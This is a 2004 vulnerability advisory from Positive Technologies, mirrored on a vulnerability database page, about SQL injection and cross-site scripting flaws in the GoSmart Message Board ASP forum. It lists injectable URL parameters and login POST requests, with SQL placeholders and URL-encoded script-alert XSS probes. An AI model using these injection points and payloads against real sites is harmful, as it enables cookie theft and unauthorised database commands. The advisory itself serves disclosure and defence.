Lucene search
K

gosmart.txt

🗓️ 13 Oct 2004 00:00:00Reported by Positive TechnologiesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Multiple vulnerabilities in GoSmart Message Board allow SQL injection and Cross Site Scripting attacks.

Code
`This vulnerability was discovered by Positive Technologies using  
MaxPatrol (www.maxpatrol.com) - intellectual professional security  
scanner. It is able to detect a substantial amount of vulnerabilities  
not published yet. MaxPatrol's intelligent algorithms are also capable  
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and  
code injections, HTTP Response splitting).  
  
  
Date: 11.10.04  
  
Severity: Low  
  
  
  
Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx  
  
  
  
Platform: ASP  
  
  
  
I. DESCRIPTION  
  
--------------  
  
Multiple vulnerabilities were found in GoSmart Message Board. A remote  
user can conduct SQL injection attack and Cross site scripting attack.   
  
  
  
1. SQL injection (minimal risk, because using Access database)  
  
  
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1  
  
messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]  
  
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1  
  
messageboard/Forum.asp?Category=[SQL CODE HERE]  
  
POST /messageboard/Login_Exec.asp HTTP/1.1   
Host: www.gosmart4u.com   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 29   
  
Username=[SQL CODE HERE]&Password=1&Login=1   
  
  
POST /messageboard/Login_Exec.asp HTTP/1.1   
Host: www.gosmart4u.com   
Content-Type: application/x-www-form-urlencoded   
Content-Length: 29   
  
Username=1&Password=[SQL CODE HERE]&Login=1  
  
  
2. XSS:  
  
/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript  
%3Ealert%28%29%3C%2Fscript%3E%3C%22  
  
/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%  
28%29%3C%2Fscript%3E%3C%22  
  
  
  
  
II. IMPACT  
  
----------  
  
  
A remote user can access the target user's cookies (including  
authentication cookies).   
  
A remote user can cause SQL commands to be executed by the underlying  
database.  
  
  
  
  
III. SOLUTION  
  
-------------  
Not available currently.  
  
  
  
IV. VENDOR FIX/RESPONSE  
  
-----------------------  
n/a  
  
  
V. CREDIT  
  
-------------  
Positive Technologies (www.ptsecurity.com) is information security  
company especially focused on development of MaxPatrol - professional  
security scanner.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation